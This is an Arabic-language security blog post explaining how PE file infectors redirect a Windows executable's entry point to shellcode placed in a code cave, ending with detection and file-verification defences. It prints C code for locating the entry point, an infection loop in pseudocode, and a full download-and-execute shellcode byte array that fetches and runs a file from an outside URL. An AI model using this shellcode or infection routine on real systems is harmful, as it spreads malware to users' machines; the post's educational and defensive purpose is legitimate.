<!DOCTYPE html>
<html dir="rtl" lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.6.1 -->
<title>آلية عمل PE Infection | wes4m</title>
<meta name="generator" content="Jekyll v3.8.6" />
<meta property="og:title" content="آلية عمل PE Infection" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="توجد طرق إنتشار عديدة للبرمجيات الخبيثة عبر ثغرات الشبكات وغيرها. ولكن من الطرق المهمل ذكرها في المجتمع السيبراني العربي ما أكتب عنه هذا المقال. أتمنى أن يعود بفائدة للقارئ في حماية نفسه من مخاطر إنتشار البرمجيات الخبيثة. طرق الحماية في نهاية المقال. كما سأشرح بإختصار آلية عملها للمهتمين فالأمن السايبراني." />
<meta property="og:description" content="توجد طرق إنتشار عديدة للبرمجيات الخبيثة عبر ثغرات الشبكات وغيرها. ولكن من الطرق المهمل ذكرها في المجتمع السيبراني العربي ما أكتب عنه هذا المقال. أتمنى أن يعود بفائدة للقارئ في حماية نفسه من مخاطر إنتشار البرمجيات الخبيثة. طرق الحماية في نهاية المقال. كما سأشرح بإختصار آلية عملها للمهتمين فالأمن السايبراني." />
<link rel="canonical" href="http://localhost:4000/misc/2018/08/12/PeInfection.html" />
<meta property="og:url" content="http://localhost:4000/misc/2018/08/12/PeInfection.html" />
<meta property="og:site_name" content="wes4m" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-08-12T04:51:01-07:00" />
<script type="application/ld+json">
{"url":"http://localhost:4000/misc/2018/08/12/PeInfection.html","headline":"آلية عمل PE Infection","dateModified":"2018-08-12T04:51:01-07:00","datePublished":"2018-08-12T04:51:01-07:00","description":"توجد طرق إنتشار عديدة للبرمجيات الخبيثة عبر ثغرات الشبكات وغيرها. ولكن من الطرق المهمل ذكرها في المجتمع السيبراني العربي ما أكتب عنه هذا المقال. أتمنى أن يعود بفائدة للقارئ في حماية نفسه من مخاطر إنتشار البرمجيات الخبيثة. طرق الحماية في نهاية المقال. كما سأشرح بإختصار آلية عملها للمهتمين فالأمن السايبراني.","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/misc/2018/08/12/PeInfection.html"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="wes4m" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><!-- <a class="site-title" rel="author" href="/">wes4m</a> --><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger">
         

          
          
		  <!--<a class="page-link" href="/feed.xml"></a>-->
    	  
		  <!--<a class="page-link" href="/01-posts.html">Posts</a>-->
    	  
		  <!--<a class="page-link" href="/about/">wes4m</a>-->
    	  
		  <!--<a class="page-link" href="/404.html"></a>-->
    	  
		  <!--<a class="page-link" href="/"></a>-->
    	  
		  <!--<a class="page-link" href="/assets/main.css"></a>-->
    	  

	  <a class="page-link" href="https://ctf.wes4m.io">CTF</a>
	  <a class="page-link" href="/01-posts.html">Posts</a>
	  <a class="page-link" href="/about/">wes4m</a>
	
	</div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">آلية عمل PE Infection</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2018-08-12T04:51:01-07:00" itemprop="datePublished">Aug 12, 2018
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>توجد طرق إنتشار عديدة للبرمجيات الخبيثة عبر ثغرات الشبكات وغيرها. ولكن من الطرق المهمل ذكرها في المجتمع السيبراني العربي ما أكتب عنه هذا المقال. أتمنى أن يعود بفائدة للقارئ في حماية نفسه من مخاطر إنتشار البرمجيات الخبيثة.
طرق الحماية في نهاية المقال. 
كما سأشرح بإختصار آلية عملها للمهتمين فالأمن السايبراني.</p>

<h2 id="ماهي">ماهي</h2>
<p>عدوى الملفات التنفيذية أو PE Infection
هي من أقدم الطرق المستخدمة في نشر الملفات الخبيثة من باك دورز أو فايروسات وغيره في الجهاز. هي طريقة مستوحاة من الإلتهاب وكيفية إنتشاره لما يحيط به من خلايا الجسم. 
تكمن قوة الآلية في كونها تصيب أغلب الملفات التنفيذية في الجهاز المستهدف وبدوره يكون كل ملف مصاب وسيلة لنشر العدوى. فعند نقل أي ملف تنفيدي من جهاز مصاب لجهاز آخر ثم تنفيذه يعني ذلك إصابة جهاز جديد.</p>

<p>تعمل الفكرة على أغلب الأنظمة المعروفة ولكن سأتطرق لعملها على نظام Windows فقط لفعاليتها العالية على هذا النظام تحديداً وفشلها لأسباب عدة فالأنظمة الإخرى سنتطرق لها لاحقاً.
كما تشير كلمة PE في العنوان إلى Portable Executabe وهي تركيبة الملفات التنفيذية المستخدمة في نظام Windows.</p>

<h3 id="كيفية-عملها">كيفية عملها</h3>
<p><img src="/content/peinfc.jpg" alt="peinfc" /></p>

<h3 id="مخاطرها">مخاطرها</h3>
<p>سرعة الإنتشار العالية. وعملها بصمت بحيث يعمل كل ملف في جهازك لصالح الإنتشار بدون علمك. كون الملفات تعمل بشكل طبيعي.
أيضا صعوبة التخلص منها. وسهولة مرورها على بعض الخبراء الأمنيين غير المطلعين على هذه الآلية. فيمكن أن يعتقد الخبير الأمني بأنه تخلص من كل أثر لأداة التجسس على سبيل المثال، دون أن يعلم بأنه بمجرد تنفيذه لملف آخر في جهازه سيقوم الملف بتحميل الأداة وتنفيذها مرة إخرى.</p>

<p>أما الآن فماهي تفاصيل الآلية. 
قبل أن أتطرق لكيفية التنفيذ لابد أن نعرف تركيبة الملفات التنفيذية وكيف تعمل لإستغلالها.</p>

<p>ملاحظة: لفهم الشرح بشكل أفضل يفضل أن تكون على علم بكيفية عمل الذاكرة والملفات   في الجهاز Virutal &amp; Base Addressing</p>

<h3 id="كيف-تعمل-ملفات-windows-التنفيذية-exe-32-bit">كيف تعمل ملفات Windows التنفيذية (Exe 32-bit)</h3>
<p>يتضمن عمل الملف التنفيذي الكثير من العمليات اللتي يطول شرحها لتهيئة النظام والملف للتنفيذ. ولكن مايهمنا هو نقطة بداية الملف أو مايسمى Entry point
وهو العنوان اللذي يبدأ النظام تنفيد أكواد الملف من عنده.</p>

<p>يتكون الملف التنفيذي كبقية الملفات من بايتات عبارة عن معلومات عن الملف والكود التنفيذي والبيانات من نصوص وغيرها.</p>

<p>تركيبة الملف التنفيذي:
<img src="/content/mzhead.jpg" alt="mzhead" /></p>

<p>يهمنا PE Header أو NT Header وهو ستركتشر آخر يحتوى على معلومات مهمة لتنفيذ الآلية</p>

<p>مانبحث عنه هو نقطة الإدخال Entry Point
لأنه بتعديل تلك النقطة لعنوان آخر سيقوم النظام بتنفيد الملف من تلك النقطة
واللتي يمكننا إستغلالها بوضع كود خاص مهمته تحميل الملف وتنفيده. ثم ننفذ نقطة الإدخال السابقة قبل التعديل بعد تنفيذ مانريد فيعمل الملف بشكل طبيعي من نقطة الإدخال الإصلية.</p>

<p>يجب أيضآ أن لا ننسى الإحتفاظ بعنوان نقطة الإدخال السابق للعودة إليه لتنفيد الملف بشكل طبيعي
قبل تعديل الـ AddressOfEntryPoint لتشير للكود اللذي نريد تنفيذه فالملف</p>

<p>يمكننا الإطلاع على الستركتشرز من msdn</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">typedef</span> <span class="k">struct</span> <span class="n">_IMAGE_NT_HEADERS</span> <span class="p">{</span>
  <span class="n">DWORD</span>                   <span class="n">Signature</span><span class="p">;</span>
  <span class="n">IMAGE_FILE_HEADER</span>       <span class="n">FileHeader</span><span class="p">;</span>
  <span class="n">IMAGE_OPTIONAL_HEADER32</span> <span class="n">OptionalHeader</span><span class="p">;</span>
<span class="p">}</span> <span class="n">IMAGE_NT_HEADERS32</span><span class="p">,</span> <span class="o">*</span><span class="n">PIMAGE_NT_HEADERS32</span><span class="p">;</span>
</code></pre></div></div>

<p>نقطة الإدخال توجد في IMAGE_OPTIONAL_HEADER</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">typedef</span> <span class="k">struct</span> <span class="n">_IMAGE_OPTIONAL_HEADER</span> <span class="p">{</span>
  <span class="n">WORD</span>                 <span class="n">Magic</span><span class="p">;</span>
  <span class="n">BYTE</span>                 <span class="n">MajorLinkerVersion</span><span class="p">;</span>
  <span class="n">BYTE</span>                 <span class="n">MinorLinkerVersion</span><span class="p">;</span>
  <span class="n">DWORD</span>                <span class="n">SizeOfCode</span><span class="p">;</span>
  <span class="n">DWORD</span>                <span class="n">SizeOfInitializedData</span><span class="p">;</span>
  <span class="n">DWORD</span>                <span class="n">SizeOfUninitializedData</span><span class="p">;</span>
  <span class="n">DWORD</span>                <span class="n">AddressOfEntryPoint</span><span class="p">;</span>
  <span class="n">DWORD</span>                <span class="n">BaseOfCode</span><span class="p">;</span>
  <span class="n">DWORD</span>                <span class="n">BaseOfData</span><span class="p">;</span>
    <span class="p">..</span>
    <span class="p">..</span>
    <span class="p">..</span>
</code></pre></div></div>

<p>فعالية هذه الآلية في نظام وندوز تعتمد على وجود صلاحيات كتابة لباقي الملفات المجاورة. على عكس الأنظمة المتبقية التي تفشل فيها بسبب التشديد في صلاحيات فتح وقراءة وتعديل الملفات.
مثال على فتح ملف والحصول على موقع تعديل نقطة الإدخال وحفظ نقطة الإدخال القديمة</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="n">LPCSTR</span> <span class="n">fileName</span> <span class="o">=</span> <span class="s">".."</span><span class="p">;</span>
    <span class="n">HANDLE</span> <span class="n">hFile</span><span class="p">;</span> 
    <span class="n">HANDLE</span> <span class="n">hFileMapping</span><span class="p">;</span>
    <span class="n">LPVOID</span> <span class="n">lpFileBase</span><span class="p">;</span>
    <span class="n">PIMAGE_DOS_HEADER</span> <span class="n">dosHeader</span><span class="p">;</span>
    <span class="n">PIMAGE_NT_HEADERS</span> <span class="n">peHeader</span><span class="p">;</span>
    <span class="n">PIMAGE_SECTION_HEADER</span> <span class="n">sectionHeader</span><span class="p">;</span>

    <span class="n">hFile</span> <span class="o">=</span> <span class="n">CreateFileA</span><span class="p">(</span><span class="n">fileName</span><span class="p">,</span><span class="n">GENERIC_READ</span><span class="p">,</span><span class="n">FILE_SHARE_READ</span><span class="p">,</span><span class="nb">NULL</span><span class="p">,</span><span class="n">OPEN_EXISTING</span><span class="p">,</span><span class="n">FILE_ATTRIBUTE_NORMAL</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
    
    <span class="k">if</span><span class="p">(</span><span class="n">hFile</span> <span class="o">==</span> <span class="n">INVALID_HANDLE_VALUE</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"CreateFile failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="n">hFileMapping</span> <span class="o">=</span> <span class="n">CreateFileMapping</span><span class="p">(</span><span class="n">hFile</span><span class="p">,</span><span class="nb">NULL</span><span class="p">,</span><span class="n">PAGE_READONLY</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="nb">NULL</span><span class="p">);</span>
    
    <span class="k">if</span><span class="p">(</span><span class="n">hFileMapping</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"CreateFileMapping failed </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">CloseHandle</span><span class="p">(</span><span class="n">hFile</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="n">lpFileBase</span> <span class="o">=</span> <span class="n">MapViewOfFile</span><span class="p">(</span><span class="n">hFileMapping</span><span class="p">,</span><span class="n">FILE_MAP_READ</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
    
    <span class="k">if</span><span class="p">(</span><span class="n">lpFileBase</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"MapViewOfFile failed </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">CloseHandle</span><span class="p">(</span><span class="n">hFileMapping</span><span class="p">);</span>
        <span class="n">CloseHandle</span><span class="p">(</span><span class="n">hFile</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="n">dosHeader</span> <span class="o">=</span> <span class="p">(</span><span class="n">PIMAGE_DOS_HEADER</span><span class="p">)</span> <span class="n">lpFileBase</span><span class="p">;</span>
    
    <span class="k">if</span><span class="p">(</span><span class="n">dosHeader</span><span class="o">-&gt;</span><span class="n">e_magic</span><span class="o">==</span><span class="n">IMAGE_DOS_SIGNATURE</span><span class="p">)</span> <span class="p">{</span>
    
        <span class="n">peHeader</span> <span class="o">=</span> <span class="p">(</span><span class="n">PIMAGE_NT_HEADERS</span><span class="p">)</span> <span class="p">((</span><span class="n">u_char</span><span class="o">*</span><span class="p">)</span><span class="n">dosHeader</span><span class="o">+</span><span class="n">dosHeader</span><span class="o">-&gt;</span><span class="n">e_lfanew</span><span class="p">);</span>
    
        <span class="k">if</span><span class="p">(</span><span class="n">peHeader</span><span class="o">-&gt;</span><span class="n">Signature</span><span class="o">==</span><span class="n">IMAGE_NT_SIGNATURE</span><span class="p">)</span> <span class="p">{</span>
    
            <span class="n">DWORD</span> <span class="n">ep</span> <span class="o">=</span> <span class="n">peHeader</span><span class="o">-&gt;</span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">AddressOfEntryPoint</span><span class="p">;</span>
            <span class="n">DWORD</span> <span class="n">oldEp</span> <span class="o">=</span> <span class="n">ep</span> <span class="o">+</span> <span class="n">peHeader</span><span class="o">-&gt;</span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">ImageBase</span><span class="p">;</span>
    
            <span class="n">sectionHeader</span> <span class="o">=</span> <span class="n">IMAGE_FIRST_SECTION</span><span class="p">(</span><span class="n">peHeader</span><span class="p">);</span>
    
            <span class="n">UINT</span> <span class="n">nSectionCount</span> <span class="o">=</span> <span class="n">peHeader</span><span class="o">-&gt;</span><span class="n">FileHeader</span><span class="p">.</span><span class="n">NumberOfSections</span><span class="p">;</span>
            <span class="n">UINT</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
            <span class="k">for</span><span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;=</span><span class="n">nSectionCount</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">,</span> <span class="o">++</span><span class="n">sectionHeader</span> <span class="p">)</span>
            <span class="p">{</span>
                <span class="k">if</span><span class="p">((</span><span class="n">sectionHeader</span><span class="o">-&gt;</span><span class="n">VirtualAddress</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">ep</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">sectionHeader</span><span class="o">--</span><span class="p">;</span>
                    <span class="k">break</span><span class="p">;</span>
                <span class="p">}</span>
            <span class="p">}</span>
    
            <span class="k">if</span><span class="p">(</span><span class="n">i</span> <span class="o">&gt;</span> <span class="n">nSectionCount</span><span class="p">)</span>
            <span class="p">{</span>
                <span class="n">sectionHeader</span> <span class="o">=</span> <span class="n">IMAGE_FIRST_SECTION</span><span class="p">(</span><span class="n">peHeader</span><span class="p">);</span>
                <span class="n">UINT</span> <span class="n">nSectionCount</span> <span class="o">=</span> <span class="n">peHeader</span><span class="o">-&gt;</span><span class="n">FileHeader</span><span class="p">.</span><span class="n">NumberOfSections</span><span class="p">;</span>
                <span class="k">for</span><span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="n">nSectionCount</span><span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">,</span><span class="o">++</span><span class="n">sectionHeader</span><span class="p">);</span>
            <span class="p">}</span>
    
            <span class="n">DWORD</span> <span class="n">retAddr</span> <span class="o">=</span> <span class="n">ep</span> <span class="o">-</span> <span class="p">(</span><span class="n">sectionHeader</span><span class="o">-&gt;</span><span class="n">VirtualAddress</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">sectionHeader</span><span class="o">-&gt;</span><span class="n">PointerToRawData</span><span class="p">);</span>
            <span class="n">DWORD</span> <span class="n">offsetToEdit</span> <span class="o">=</span> <span class="p">(</span><span class="n">DWORD</span><span class="p">)(</span><span class="n">retAddr</span><span class="o">+</span><span class="p">(</span><span class="n">PBYTE</span><span class="p">)</span><span class="n">lpFileBase</span><span class="p">);</span>


        <span class="p">}</span>
    <span class="p">}</span>
    
    <span class="n">UnmapViewOfFile</span><span class="p">(</span><span class="n">lpFileBase</span><span class="p">);</span>
    <span class="n">CloseHandle</span><span class="p">(</span><span class="n">hFileMapping</span><span class="p">);</span>
    <span class="n">CloseHandle</span><span class="p">(</span><span class="n">hFile</span><span class="p">);</span>
</code></pre></div></div>

<h3 id="shell-code-و-codecave">Shell-code و CodeCave</h3>
<p>ملاحظة: هذا الجزء يتطلب بعض المعرفة بلغة الاسمبلي وطريقة عمل المعالج</p>

<p>أما الآن وبعد أن أصبح بإمكاننا تعديل نقطة الإدخال وتوجيه الملف لأي نقطة نرغب أن يبدأ التنفيد من عندها لابد أيضا من أن نعدل على بايتات الملف ليحمل الكود اللذي نرغب بتنفيذه
وهو مايدعى بـ ShellCode
ولكن لايمكننا كتابته في مكان حيث يوجد بيانات فقد يقوم هذا بتدمير الملف وقد لايعمل بشكل طبيعي. أيضا لايمكننا كتابته فوق مكان يوجد فيه كود خاص بالملف الأصلي فقد يدمر ذلك عمل الملف. 
ومن هنا نخرج بمايسمى Code cave
وهي منطقة في كود الملف خالية من الاكواد أو ملية بأمر من لغة الاسمبلي وهو NOP
يقوم المعالج بالمرور فوقه بدون تنفيد أي أمر.
وغالبا مانجد في الملفات التنفيذية سلسلة من الإمر NOP متتالية يمكننا إستبدالها بالكود المراد. لكن يجب أن يكون الحجم مناسب لكتابة الشل كود
فقد تكون مجرد 3 NOPs متتالية
بمساحة مجموعها 12 بايت. وهي مساحة غير كافية لكتابة شل كود في الغالب</p>

<p>لذلك يجب على الملف الخبيث أن يكون قادر على البحث في الملفات عن CodeCave بمساحة كافية لكتابة الشل كود فيها ثم توجيه نقظة الإدخال للموقع الجديد اللذي يحتوي عليه.</p>

<p>أحد الأدوات التي يمكن أن يستعين بها الملف في هذه العملية
https://github.com/axcheron/pycave</p>

<p>أو يمكن للملف البحث عن عدد كافي من الـ NOPs</p>

<h4 id="كتابة-الشل-كود">كتابة الشل كود</h4>
<p>توجد بعض التحديات في كتابة الشيل كودز نظرآ للتغير العشوائي في الذاكرة
وإختلاف موقع الدوال من جهاز لآخر. أيضا اختلاف مساحة العناوين.</p>

<p>يوجد عدد كبير من الشل كودز والبايلودز الممكن إستخدامهم لأهداف متعددة أحدها إستخدام دالة الويندوزURLDownloadToFile لتحميل ملف وثم تنفيذه</p>

<p>أو يمكن أن تقوم بكتابة الشل كود الخاص بك بإستخدام الاسمبلي ثم إستخدام بايتاته وكتابتها في الـ Code cave</p>

<p>مثال:
https://www.exploit-db.com/exploits/24318/</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">shellcode</span><span class="p">[]</span> <span class="o">=</span>
<span class="s">"</span><span class="se">\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8B\x14\x8E\x03\xD3\x33\xC9\x51\x68\x2E</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x65\x78\x65\x68\x64\x65\x61\x64\x53\x52</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xFF\xFF</span><span class="s">"</span>
<span class="c1">// http://bflow.security-portal.cz/down/xy.txt</span>
<span class="s">"</span><span class="se">\x68\x74\x74\x70\x3A\x2F\x2F\x62</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x66\x6C\x6F\x77\x2E\x73\x65\x63\x75\x72</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x69\x74\x79\x2D\x70\x6F\x72\x74\x61\x6C</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x2E\x63\x7A\x2F\x64\x6F\x77\x6E\x2F\x78</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x79\x2E\x74\x78\x74\x00</span><span class="s">"</span><span class="p">;</span>
</code></pre></div></div>

<h3 id="الآلية-بالكامل">الآلية بالكامل</h3>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// البحث عن جميع الملفات في حلقة تكرار</span>
<span class="p">{</span>
    <span class="c1">// فتح الملف وتخزين نقطة الإدخال القديمة والبحث عن Code Cave</span>
        <span class="p">{</span>
        <span class="c1">// عند الحصول على مساحة كافية. كتابة الشل كود وحفظ عنوان بداية الشل كود</span>
        <span class="c1">// كتابة قفزة JMP لعنوان نقطة الإدخال الأصلي عن الإنتهاء من تنفيذ الشل كود </span>
        <span class="c1">// تعديل نقطة الإدخال لعنوان الشل كود</span>
        <span class="c1">// حفظ تعديلات الملف</span>
        <span class="c1">// الملف التالي ...</span>
    <span class="p">}</span>
<span class="p">}</span>

</code></pre></div></div>

<h3 id="طرق-الحماية">طرق الحماية</h3>
<ul>
  <li>
    <p>من أهم الطرق المتبعة مايسمى Pattern recognition
وهو تخزين الشل كود أو جزء منه. على سبيل المثال بايتات رابط الملف فالشل كود
ثم البحث في بايتات الملفات عنه. فعند وجوده يعني أن الملف مصاب ويمكن بسهولة علاجه بتعديل نقطة الإدخال وحذف الشل كود. وتطبيق هذه الطريقة على جميع الملفات 
إلا أنه يمكن تجاوز هذه الطريقة بإستخدام عدة تقنيات منها مايسمى polymorphic code وهي تقنية تقوم بإصدار كود مختلف في كل مرة ولكن يؤدي نفس العمل
أو بمجرد وضع بعض من العشوائية في الشل كود</p>
  </li>
  <li>
    <p>File verification
من طرق الحماية الإخرى والتي يمكن إتباعها للحماية من عدة هجمات للتأكد من سلامة الملف.
عن طريق إصدار وإسم الملف يمكنك مقارنته مع الملف الرسمي بعدة طرق
أما رفع الملف في مواقع المقارنة وفحص الملفات لمقارنة الهاش الخاص بالملف 
أو عن طريق موجه أوامر وندوز بإستعمال الأمر</p>
    <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="n">FC</span> <span class="p">[</span><span class="n">pathname1</span><span class="p">]</span> <span class="p">[</span><span class="n">pathname2</span><span class="p">]</span>
</code></pre></div>    </div>
    <p>فعند وجود إختلاف بالرغم من تطابق الإصدار والشركة والحجم فلابد من فحص الجهاز والملف للتأكد من سلامة جهازك.</p>
  </li>
</ul>


  </div><div id="disqus_thread"></div>
  <script>
    var disqus_config = function () {
      this.page.url = 'http://localhost:4000/misc/2018/08/12/PeInfection.html';
      this.page.identifier = 'http://localhost:4000/misc/2018/08/12/PeInfection.html';
    };

    (function() {
      var d = document, s = d.createElement('script');

      s.src = 'https://wes4m.disqus.com/embed.js';

      s.setAttribute('data-timestamp', +new Date());
      (d.head || d.body).appendChild(s);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript><a class="u-url" href="/misc/2018/08/12/PeInfection.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">wes4m</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
         <!-- <li class="p-name">wes4m</li> --></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/wes4m"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">wes4m</span></a></li><li><a href="https://www.twitter.com/zawessam"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">zawessam</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>Blogging in hopes of being l33t one day</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
